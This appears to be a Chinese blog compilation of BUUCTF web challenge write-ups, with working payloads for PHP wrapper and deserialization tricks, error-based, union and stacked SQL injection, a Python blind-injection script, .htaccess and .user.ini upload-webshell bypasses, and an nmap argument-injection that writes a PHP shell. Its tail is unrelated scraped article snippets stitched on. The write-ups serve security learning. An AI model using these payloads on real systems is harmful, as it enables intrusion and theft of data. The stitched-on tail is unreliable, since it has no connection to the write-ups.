  代码审计：有这样一行代码isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"，我们需要传入一个内容为welcome to the zjctf的文件。这时就要用到data协议，data协议通常是用来执行PHP代码，也可以将内容写入data协议中，然后让file_get_contents函数取读取。构造：data://text/plain,welcome to the zjctf，为了绕过某些过滤，这里用到base64编码。构造payload：text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=。然后有一个可控参数file，构造file=useless.php，但是针对php文件我们需要进行base64编码，否则读取不到其内容，所以构造payload：file=php://filter/read=convert.base64-encode/resource=useless.php。
 得到以下经过base64加密的字符，
 
 接下来进行base64解密，得到useless.php内容 
    

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

 
    
class Flag{
    public $file='flag.php';  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
} 
$password=new Flag();
$password = serialize($password);
echo $password; 
?>  

 
  
 故最后payload为/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
 查看源码
  
  [SUCTF 2019]CheckIn 
  具体知识点点这里 
   
    方法一：user.ini文件构成PHP后门
 创建.user.ini文件，前面的GIF是为了绕过检测；因为后台用exif_imagetype函数检测文件类型，所以我们在文件前加上图片的特征，来绕过检测。
 
 上传
 
 创建图片文件
 
 上传
 
 蚁剑链接http://5df3767e-4da9-41f9-85fc-6629510b2f2b.node4.buuoj.cn:81/uploads/ea6cf191dc7eec7b0e43199e459204e5/index.php
 
 
 
 拿到flag~~
  
    方法二：命令执行
 上传图片马后，扫描根目录：/index.php?a=var_dump(scandir("/"));
 我们可以可以看见一个叫flag的文件
 /index.php?a=var_dump(file_get_contents("/flag"));or/index.php?a=system('cat /flag');
  
   
  [极客大挑战 2019]HardSQL 
  经测试，一些and、union、select、空格等常见的SQL语句被过滤了 
   
   updataxml()函数用法 
   UPDATEXML (XML_document, XPath_string, new_value); 
   第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
 第二个参数：XPath_string(Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。
 第三个参数：new_value，String格式，替换查找到的符合条件的数据 作用：改变文档中符合条件的节点
 例：第二个参数使用不符合语法的参数，就会爆出错误信息 
   
   
   爆库名：?username=admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=111——geek 
   爆表名：?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(%27geek%27)),0x7e),1))%23&password=111——H4rDsq1 
   爆字段：?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(%27H4rDsq1%27)),0x7e),1))%23&password=111——id,username,password 
   爆数据：?username=admin%27or(updatexml(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e),1))%23&password=111——flag{2ffec74c-5046-40b9-b115-ed
 这里只爆出前面一部分flag，然后再使用right()函数拼接flag
 ?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=111——6-40b9-b115-edce687a298b} 
   
  [网鼎杯 2020 青龙组]AreUSerialz 
  题目类型：PHP序列化+代码审计 
   <?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;
	//类一执行就开始调用，其作用是拿来初始化一些值。
	//创建对象时触发
    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: 
";
        echo $s;
    }
	//　类执行完毕以后调用，其最主要的作用是拿来做垃圾回收机制。
	//对象被销毁时触发
    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}
//判断变量是否为可显示字符，即ascii码值在32~125，
//若是，则返回true，否则返回false
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
//若以get传参的str变量的ASCII码值在32~125，则进行反序列化
if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

 
  代码审计：op变量使用强类型比较===判断this->op的值是否等于字符串2，如果等于，则将其置为1。在process()方法中，使用弱类型比较==判断op的值是否对等于字符串2，若为真，则执行read()方法与output()方法。在read()方法中，使用file_get_contents()函数来读取属性filename路径的文件。 
  编造序列化（利用public属性序列化，绕过is_valid()函数） 
  
class FileHandler{
	public $op = 2;
	public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
	public $content;
}
$obj = new FileHandler();
echo serialize($obj);
?>
 
  得到序列化结果为O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
 构造payload：/?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
 然后将得到的结果base64解码
 拿到flag~~ 
  [MRCTF2020]你传你呢 
  具体知识点点这里
  
  我先试着个一句话木马上去
 上传失败，
 接着又试了试图片马，
  
  还是不行
 然后就试了一下上个题的两个文件
 
 上传.user.ini文件时，上传失败
  
  
 上传木马文件时竟然成功了，但是尝试用蚁剑连一下，连接失败
 看来上一题的方法不能用，下面是学习大佬的方法 
  做题步骤
 此题需要上传两个文件 
  第一个：.htaccess文件，用来改变文件扩展名 
  <FilesMatch "a.png">
SetHandler application/x-httpd-php
</FilesMatch>
 
  指定的是要上传的文件，注意文件名必须相同 
  上传时先抓包，修改Content-Type:image/png
 点击forward，上传成功 
   
  第二个：木马文件，用来连接蚁剑或菜刀
 
 上传时同样修改Content-Type:image/png
 用蚁剑连接：http://93ac29f7-de06-4936-9f07-9b157b4704d2.node4.buuoj.cn:81/upload/fa59a7192463c0cd3dae65088e762e1f/a.png
 连接成功
 
 拿到flag~~ 
  [MRCTF2020]Ez_bypass 
  题目类型：md5
 F12查看源码 
  I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first
 
  这里要求md5($id) === md5($gg) && $id !== $gg 
   
   md5($v1)===md5($v2)数组绕过：a[]=a&b[]=b
 最后可能会报错，但是null=null，判断为true，成功绕过 
   
  使用数组绕过：/?id[]=a&gg[]=b
 接着要以POST传参 
  if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
 
  其中is_numeric()函数用于检测变量是否为数字或数字字符串。这里要求passwd不是数字或数字字符串时，弱等于判断passwd是否等于1234567
 故构造payload：passwd=1234567a
 
 拿到flag~~ 
  [GXYCTF2019]BabySQli 
  
 一个输入框，随便输入
 
 发现进入了search.php
 查看源码
 
 第一行有一串加密的字符，base32+base64解密
 得到：select * from user where username = '$name'
 爆字段数：name=admin' Order by 3 #&pw=1——注意：这里的or被过滤，使用大小写绕过 
  经测试admin在第二字段
 name=1' union select 1,'admin','202cb962ac59075b964b07152d234b70' #&pw=123 
  最后查看一下源码 
  <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";

// 去除转义
if (get_magic_quotes_gpc()) {
	function stripslashes_deep($value)
	{
		$value = is_array($value) ?
		array_map('stripslashes_deep', $value) :
		stripslashes($value);
		return $value;
	}

	$_POST = array_map('stripslashes_deep', $_POST);
	$_GET = array_map('stripslashes_deep', $_GET);
	$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
	$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

?>
 
  下面代码过滤了/\(|\)|\=|or/字符 
  if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
 
  这里表示password进行了md5加密，且用户必须是admin 
  if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
 
  [CISCN2019 华北赛区 Day2 Web1]Hack World 
   
  显示了一些常见的SQL字符，很多都被过滤了
 但还有()字符没被过滤，我们使用()代替空格，而且题目提示flag在flag表的flag字段中
 这里使用脚本爆破 
  # -*- coding:utf-8 -*-
# Author: mochu7
import requests
import string

def blind_injection(url):
	flag = ''
	strings = string.printable
	for num in range(1,60):
		for i in strings:
			payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i))#format函数设置指定位置{0}{1}
			post_data = {"id":payload}
			res = requests.post(url=url,data=post_data)
			if 'Hello' in res.text:
				flag += i
				print(str(num)+':'+flag)
			else:
				continue
	print(flag)


if __name__ == '__main__':
	url = 'http://f22f114e-13f7-4f18-8877-3429e32adcbd.node4.buuoj.cn:81/index.php'
	blind_injection(url)


 
  这里有的字符因时间过长可能会跳过，多执行几次累加起来即可 
  [GYCTF2020]Blacklist 
  题目类型：堆叠注入+HANDLER
 
 1';show databases;#
 
 1';show tables;#
 
 1'; show columns from FlagHere;#
 
 发现这里有一些过滤
 
 然后我就没思路了，记得跟 [强网杯 2019]随便注 差不多，但这个过滤的更严 
  下面是学习大佬的方法： 
  HANDLER OPEN语句打开一个表，使其可以使用后续HANDLER READ语句访问，该表对象未被其他会话共享，并且在会话调用HANDLER CLOSE或会话终止之前不会关闭
 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
  
  [网鼎杯 2018]Fakebook 
  题目类型：sql+ssrf+序列化+代码审计
 像这种blog猜测应该是xss漏洞
  
  点击join，先试了一下xss
 
 
 抓包看看没什么思路 
  查看大佬博客发现，blog是有限制的，必须http开头
 然后发现username处是个链接，点进去
 URL里有个参数no，使no=0试一试
 
 没有什么新发现
 尝试看看有没有SQL注入漏洞，使no=1'
 报错了，SQL语法错误，说明这是个数字型的sql注入 
  
 经过尝试，发现union被过滤，这里空格用/**/代替，构造?no=0/**/union/**/select/**/1,2,3,4#
 
 从报错信息来看，回显位置是2，而且这里的数据都被进行了序列化，爆出路径/var/www/html 
  使用dirsearch扫描目录，发现user.php.bak，访问，出现源码 
  
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }
    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
 
  代码审计：get函数中有出现curl_exec()，存在ssrf，且没有过滤。curl可用file协议，blog属性调用了get函数，所以这里使用file协议读取文件。file:///var/www/html/flag.php 
  所以我们先编写脚本进行序列化 
  
class UserInfo{
	public $name = '1';
	public $age = 0;
	public $blog = "file:///var/www/html/flag.php";	
}
$obj = new UserInfo();
echo serialize($obj);
?>
 
   
  构造payload：?no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/f0c62715328b499bbb4a190660a07885.png?x-oss-process=imageflag.php文件的内容出现在iframe中，F12查看
  
  拿到flag~~ 
  [GXYCTF2019]BabyUpload 
  题目类型：图片马+通过配置文件构造PHP后门 
  随便上传图片马，都提示上传失败，猜测是过滤了一些字符，在前面的[MRCTF2020]你传你呢中有提到一些方法，我们先试着上传一个.htaccess文件 
  <FilesMatch "a.jpeg">
SetHandler application/x-httpd-php
</FilesMatch>
 
  点击上传时用burp抓包，修改Content-Type为：image/jpeg
 上传成功 
  再继续上传图片马
 蚁剑链接,拿到flag~~ 
  查看源码 
  
session_start();
echo " 
Upload

上传文件

";
error_reporting(0);
if(!isset($_SESSION['user'])){
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    $target_path  = getcwd() . "/upload/" . md5($_SESSION['user']);
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp  = $_FILES['uploaded']['tmp_name'];
 
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
        die("后缀名不能有ph！");
    }
    else{
        if ((($_FILES["uploaded"]["type"] == "
            ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
            $content = file_get_contents($uploaded_tmp);
            if(preg_match("/\<\?/i", $content)){
                die("诶，别蒙我啊，这标志明显还是php啊");
            }
            else{
                mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
                move_uploaded_file($uploaded_tmp, $t_path);
                echo "{$t_path} succesfully uploaded!";
            }
        }
        else{
            die("上传类型也太露骨了吧！");
        }
    }
}
?>
 
  这里只允许jpeg格式的图片上传，而且size<2048 
  [BUUCTF 2018]Online Tool 
  题目类型：rce + escapeshellarg与escapeshellcmd共用漏洞 
  先了解一下escapeshellarg（）和escapeshellcmd（）函数
 
  
  Eg： 
  
	$dir="a'";
	$a=escapeshellarg($dir);
	$b=escapeshellcmd($a);
	$c=escapeshellcmd($dir);
	print $a;
	echo "\n";
	print $b;
	echo "\n";
	print $c;
?>

执行结果为：
'a'\'''
'a'\\''\'
a\'
 
  漏洞点：单独使用escapeshellarg 和escapeshellcmd 中任意一个都不会出现问题，或者先使用escapeshellcmd再使用escapeshellarg 也不会出现问题，唯有题目中先escapeshellarg 在escapeshellcmd 会有漏洞 
  做题思路 
  

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {    //获取IP
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);  //对文件语法进行高亮显示
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);   //把字符串转码成可以在shell命令里使用的参数，将单引号进行转义，转义之后，再在左右加单引号
    $host = escapeshellcmd($host);   //对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义,将&#;`|*?~<>^()[]{}$\, \x0A和\xFF以及不配对的单/双引号转义
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);   //新建目录，默认权限，最大可能的访问权
    chdir($sandbox);    //改变目录路径，成功返回true，失败返回false
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
    // -sT，在目标主机的日志上记录大批连接请求和错误的信息
    // -Pn，扫描之前不需要用ping命令，有些防火墙禁止使用ping命令
    // -T5，时间优化参数，-T0~5，-T0扫描端口的周期大约为5分钟，-T5大约为5秒钟
    // --host-time限制扫描时间
    // -F，快速扫描
 
  代码审计system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
 所以我们现在需要构造变量host的值，使远程命令/代码能够执行 
  这里又需要了解一些nmap的知识点：在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件。可以上传一句话木马，再用蚁剑链接，就可以顺利拿到flag了 
  构造payload：?host='  -oG hack.php ' 
  然后这里返回文件名，继续用蚁剑链接 
  
 
 拿到flag 
  [RoarCTF 2019]Easy Java 
  
 点击help，发现提示：java.io.FileNotFoundException:{help.docx}，访问help,dox，好吧，啥也不是
  
  [GXYCTF2019]禁止套娃 
  题目类型：.git源码泄露 + 无参rce
 用GitHack扫一下目录：python GitHacker.py http://f788ff9a-e4f3-46f1-8eff-6b1ce92932f3.node4.buuoj.cn:81/.git/
 发现index.php：http://f788ff9a-e4f3-46f1-8eff-6b1ce92932f3.node4.buuoj.cn:81/.git/index
 访问一下
  
  [GWCTF 2019]我有一个数据库 
  题目类型：cve-2018-12613-PhpMyadmin后台文件包含漏洞
 
 一看就没有utf-8编码，编码后为

参数	描述
string	必需。规定要计算的字符串。
raw	可选。规定十六进制或二进制输出格式： TRUE - 原始 16 字符二进制格式；FALSE - 默认。32 字符十六进制数

Long类型前后端数据不一致 igotyback 前端
响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题，尤其是当后端使用Java的Long类型（64位）与前端JavaScript的Number类型（最大安全整数为2^53-1，即16位）进行数据交互时，很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
PHP环境搭建详细教程好看资源平台前端 php
PHP是一个流行的服务器端脚本语言，广泛用于Web开发。为了使PHP能够在本地或服务器上运行，我们需要搭建一个合适的PHP环境。本教程将结合最新资料，介绍在不同操作系统上搭建PHP开发环境的多种方法，包括Windows、macOS和Linux系统的安装步骤，以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类：集成开发环境：例如XAMPP、WAMP、MAMP，这
DIV+CSS+JavaScript技术制作网页（旅游主题网页设计与制作）云南大理 STU学生网页设计网页设计期末网页作业 html静态网页 html5期末大作业网页设计 web大作业
️精彩专栏推荐作者主页:【进入主页—获取更多源码】web前端期末大作业：【HTML5网页期末作业(1000套)】程序员有趣的告白方式：【HTML七夕情人节表白网页制作(110套)】文章目录二、网站介绍三、网站效果▶️1.视频演示2.图片演示四、网站代码HTML结构代码CSS样式代码五、更多源码二、网站介绍网站布局方面：计划采用目前主流的、能兼容各大主流浏览器、显示效果稳定的浮动网页布局结构。网站程
【加密社】Solidity 中的事件机制及其应用加密社闲侃区块链智能合约区块链
加密社引言在Solidity合约开发过程中，事件（Events）是一种非常重要的机制。它们不仅能够让开发者记录智能合约的重要状态变更，还能够让外部系统（如前端应用）监听这些状态的变化。本文将详细介绍Solidity中的事件机制以及如何利用不同的手段来触发、监听和获取这些事件。事件存储的地方当我们在Solidity合约中使用emit关键字触发事件时，该事件会被记录在区块链的交易收据中。具体而言，事件
关于城市旅游的HTML网页设计——(旅游风景云南 5页)HTML+CSS+JavaScript 二挡起步 web前端期末大作业 javascript html css 旅游风景
⛵源码获取文末联系✈Web前端开发技术描述网页设计题材，DIV+CSS布局制作,HTML+CSS网页设计期末课程大作业|游景点介绍|旅游风景区|家乡介绍|等网站的设计与制作|HTML期末大学生网页设计作业，Web大学生网页HTML：结构CSS：样式在操作方面上运用了html5和css3，采用了div+css结构、表单、超链接、浮动、绝对定位、相对定位、字体样式、引用视频等基础知识JavaScrip
HTML网页设计制作大作业（div+css）云南我的家乡旅游景点带文字滚动二挡起步 web前端期末大作业 web设计网页规划与设计 html css javascript dreamweaver 前端
Web前端开发技术描述网页设计题材，DIV+CSS布局制作,HTML+CSS网页设计期末课程大作业游景点介绍|旅游风景区|家乡介绍|等网站的设计与制作HTML期末大学生网页设计作业HTML：结构CSS：样式在操作方面上运用了html5和css3，采用了div+css结构、表单、超链接、浮动、绝对定位、相对定位、字体样式、引用视频等基础知识JavaScript：做与用户的交互行为文章目录前端学习路线
ARM驱动学习之4小结 JT灬新一嵌入式 C++arm开发学习 linux
ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
如何用matlab灵活控制feko的求解 NingrLi matlab 开发语言
https://bbs.rfeda.cn/read.php?tid=3778Feko中的模型和求解设置等都可以通过editfeko进行设置，其文件存储为.pre文件，该文件可以用文本打开，因此，我们可以通过VB、VC、matlab等工具对.pre文件进行读写操作，以达到更灵活的使用feko。同样，对于.out文件，我们也可以进行读操作。熟练使用对.pre文件和.out文件的操作后，我们可以方便的计
springboot+vue项目实战一-创建SpringBoot简单项目苹果酱0567 面试题汇总与解析 spring boot 后端 java 中间件开发语言
这段时间抽空给女朋友搭建一个个人博客，想着记录一下建站的过程，就当做笔记吧。虽然复制zjblog只要一个小时就可以搞定一个网站，或者用cms系统，三四个小时就可以做出一个前后台都有的网站，而且想做成啥样也都行。但是就是要从新做，自己做的意义不一样，更何况，俺就是专门干这个的，嘿嘿嘿要做一个网站，而且从零开始，首先呢就是技术选型了，经过一番思量决定选择-SpringBoot做后端，前端使用Vue做一
react-intl——react国际化使用方案苹果酱0567 面试题汇总与解析 java 开发语言中间件 spring boot 后端
国际化介绍i18n：internationalization国家化简称，首字母+首尾字母间隔的字母个数+尾字母，类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
博客网站制作教程 2401_85194651 java maven
首先就是技术框架：后端：Java+SpringBoot数据库：MySQL前端：Vue.js数据库连接：JPA(JavaPersistenceAPI)1.项目结构blog-app/├──backend/│├──src/main/java/com/example/blogapp/││├──BlogApplication.java││├──config/│││└──DatabaseConfig.java
进销存小程序源码 PHP网络版ERP进销存管理系统全开源可二开摸鱼小号 php
可直接源码搭建部署发布后使用：一、功能模块介绍该系统模板主要有进，销，存三个主要模板功能组成，下面将介绍各模块所对应的功能；进：需要将产品采购入库，自动生成采购明细台账同时关联财务生成付款账单；销：是指对客户的销售订单记录，汇总生成产品销售明细及回款计划；存：库存的日常盘点与统计，库存下限预警、出入库台账、库存位置等。1.进购管理采购订单：采购下单审批→由上级审批通过采购入库；采购入库：货品到货>
计算机毕业设计PHP仓储综合管理系统（源码+程序+VUE+lw+部署） java毕设程序源码王哥 php 课程设计 vue.js
该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置：phpStudy+Vscode+Mysql5.7+HBuilderX+Navicat11+Vue+Express。项目技术：原生PHP++Vue等等组成，B/S模式+Vscode管理+前后端分离等等。环境需要1.运行环境：最好是小皮phpstudy最新版，我们在这个版本上开发的。其他版本理论上也可以。2.开发
最简单将静态网页挂载到服务器上(不用nginx) 全能全知者服务器 nginx 运维前端 html 笔记
最简单将静态网页挂载到服务器上(不用nginx)如果随便弄个静态网页挂在服务器都要用nignx就太麻烦了，所以直接使用Apache来搭建一些简单前端静态网页会相对方便很多检查Web服务器服务状态：sudosystemctlstatushttpd#ApacheWeb服务器如果发现没有安装web服务器：安装Apache：sudoyuminstallhttpd启动Apache：sudosystemctl
补充元象二面 Redstone Monstrosity 前端面试
1.请尽可能详细地说明，防抖和节流的区别，应用场景？你的回答中不要写出示例代码。防抖（Debounce）和节流（Throttle）是两种常用的前端性能优化技术，它们的主要区别在于如何处理高频事件的触发。以下是防抖和节流的区别和应用场景的详细说明：防抖和节流的定义防抖：在一段时间内，多次执行变为只执行最后一次。防抖的原理是，当事件被触发后，设置一个延迟定时器。如果在这个延迟时间内事件再次被触发，则重
微信小程序开发注意事项 jun778895 微信小程序小程序
微信小程序开发是一个融合了前端开发、用户体验设计、后端服务（可选）以及微信小程序平台特性的综合性项目。这里，我将详细介绍一个典型的小程序开发项目的全过程，包括项目规划、设计、开发、测试及部署上线等各个环节，并尽量使内容达到或超过2000字的要求。一、项目规划1.1项目背景与目标假设我们要开发一个名为“智慧校园助手”的微信小程序，旨在为学生提供一站式校园生活服务，包括课程表查询、图书馆座位预约、食堂
Linux CTF逆向入门蚁景网络安全 linux 运维 CTF
1.ELF格式我们先来看看ELF文件头，如果想详细了解，可以查看ELF的manpage文档。关于ELF更详细的说明：e_shoff：节头表的文件偏移量（字节）。如果文件没有节头表，则此成员值为零。sh_offset：表示了该section（节）离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
字节二面 Redstone Monstrosity 前端面试
1.假设你是正在面试前端开发工程师的候选人，面试官让你详细说出你上一段实习过程的收获和感悟。在上一段实习过程中，我获得了宝贵的实践经验和深刻的行业洞察，以下是我的主要收获和感悟：一、专业技能提升框架应用熟练度：通过实际项目，我深入掌握了React、Vue等前端框架的使用，不仅提升了编码效率，还学会了如何根据项目需求选择合适的框架。问题解决能力：在实习期间，我遇到了许多预料之外的技术难题。通过查阅文
前端代码上传文件余生逆风飞翔前端 javascript 开发语言
点击上传文件import{ElNotification}from'element-plus'import{API_CONFIG}from'../config/index.js'import{UploadFilled}from'@element-plus/icons-vue'import{reactive}from'vue'import{BASE_URL}from'../config/index'i
uniapp实现动态标记效果详细步骤【前端开发】 2401_85123349 uni-app
第二个点在于实现将已经被用户标记的内容在下一次获取后刷新它的状态为已标记。这是什么意思呢？比如说上面gif图中的这些人物对象，有一些已被该用户添加为关心，那么当用户下一次进入该页面时，这些已经被添加关心的对象需要以“红心”状态显现出来。这个点的难度还不算大，只需要在每一次获取后端的内容后对标记对象进行状态更新即可。II.动态标记效果实现思路和步骤首先，整体的思路是利用动态类名对不同的元素进行选择。
360前端星计划-动画可以这么玩马小蜗
动画的基本原理定时器改变对象的属性根据新的属性重新渲染动画functionupdate(context){//更新属性}constticker=newTicker();ticker.tick(update,context);动画的种类1、JavaScript动画操作DOMCanvas2、CSS动画transitionanimation3、SVG动画SMILJS动画的优缺点优点：灵活度、可控性、性能
Vue + Express实现一个表单提交九旬大爷的梦
最近在折腾一个cms系统，用的vue+express，但是就一个表单提交就弄了好久，记录一下。环境：Node10+前端：Vue服务端：Express依赖包：vueexpressaxiosexpress-formidableelement-ui（可选）前言：axiosget请求参数是：paramsaxiospost请求参数是：dataexpressget接受参数是req.queryexpresspo
前端知识点 ZhangTao_zata 前端 javascript css
下面是一个最基本的html代码body{font-family:Arial,sans-serif;margin:20px;}//JavaScriptfunctionthatdisplaysanalertwhencalledfunctionshowMessage(){alert("Hello!Youclickedthebutton.");}MyFirstHTMLPageWelcometoMyPage
第三十一节:Vue路由:前端路由vs后端路由的了解曹老师
1.认识前端路由和后端路由前端路由相对于后端路由而言的,在理解前端路由之前先对于路由有一个基本的了解路由:简而言之,就是把信息从原地址传输到目的地的活动对于我们来说路由就是:根据不同的url地址展示不同的页面内容1.1后端路由以前咱们接触比较多的后端路由,当改变url地址时,浏览器会向服务器发送请求,服务器根据这个url,返回不同的资源内容后端路由的特点就是前端每次跳转到不同url地址,都会重新访
华雁智科前端面试题因为奋斗超太帅啦前端笔试面试问题整理 javascript 开发语言 ecmascript
1.var变量的提升题目：vara=1functionfun(){console.log(b)varb=2}fun()console.log(a)正确输出结果：undefined、1答错了，给一个大嘴巴子，错误答案输出结果为：2,1此题主要考察var定义的变量，作用域提升的问题，相当于varaa=1functionfun(){varbconsole.log(b)b=2}fun()console.l
如何建设数据中台（五）——数据汇集—打破企业数据孤岛 weixin_47088026 学习记录和总结中台数据中台程序人生经验分享
数据汇集——打破企业数据孤岛要构建企业级数据中台，第一步就是将企业内部各个业务系统的数据实现互通互联，打破数据孤岛，主要通过数据汇聚和交换来实现。企业采集的数据可以是线上采集、线下数据采集、互联网数据采集、内部数据采集等。线上数据采集主要载体分为互联网和移动互联网两种，对应有系统平台、网页、H5、小程序、App等，可以采用前端或后端埋点方式采集数据。线下数据采集主要是通过硬件来采集，例如：WiFi
Windows安装ciphey编码工具，附一道ciscn编码题例 im-Miclelson CTF工具网络安全
